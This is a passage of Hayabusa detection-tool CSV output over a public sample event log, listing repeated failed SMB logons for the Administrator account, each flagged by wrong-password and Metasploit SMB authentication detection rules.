Password,User: Administrator : Type: 3 : Workstation: CqfOAGcVcwSgaeo3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2hcqVJzkVgvUnebk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q9ZpqiTGXqJlAQTZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qCzXKlJ2vPeqqdfa : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tITW0ihpErFk3nKp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MdQqr1T4frPNlulf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: niiXRpP5AVHpG9Hu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: EThR98jZUdwNxbXQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NBsJcIw859FfEkLD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kG4Tv5vauSWhbj8F : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 453tjgRGMu46vC33 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fnzhhfszxJWxLCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dWPkeL8TnAbC1nSV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.608 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JrDmUzyK4Xxx6Jn1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.659 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bMTf9D2yjumfS9LM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.704 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8cCs65ithseTCORa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.787 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBrGAScjpAdScGmJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.823 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: n90F99qBpmUUVLId : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.864 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MLeOkIG0hVHIOnN7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vVx5uUtkaFIf7PWZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: kgd7lCQUQ3dHN18S : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b8m2MmpFVK9Uojp7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: F0NZjeu3lb5xddVQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.071 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YjjXBZnyWt0ljzpv : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.112 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sinFBozyUR0sBadM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Au22Y0LIuvTmZDpy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.184 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QDWW3VfZ7rKayV2v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.220 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zPgaFDZtc5wEupnq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpYZc2TTDfJFnPHo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.363 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rYKkl1iHImW9NwKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.434 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: KxA2dh1iUMaMWOkA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.489 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sCzEzW8jDZGGZcpd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.542 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p8510u5OsCVd94I5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.589 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2a0whHngnv7o1Bz2 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.628 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xy6cGuYgubjlXoMw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.668 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: luoXLN2XZQC0lHfu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.708 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8jdKLW96haKCHHXI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.745 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9SQSH6E1aKXu1o7T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.792 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nOUdKa838wK1mLFw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.825 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aFmILxspIJsiEHwL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: pCz7qbdSEyqxQSKm : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.912 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ny3F1xPgakJK0CA7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:59.960 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Vi7Moaa6d12CzWhl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.001 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4fbbRVOig9bn9p5g : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.048 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qSZrfRe9d0LLkbmA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.079 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QqdZMYsbXFlrKFxk : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kypdxj88trEUBEny : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:00.152 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
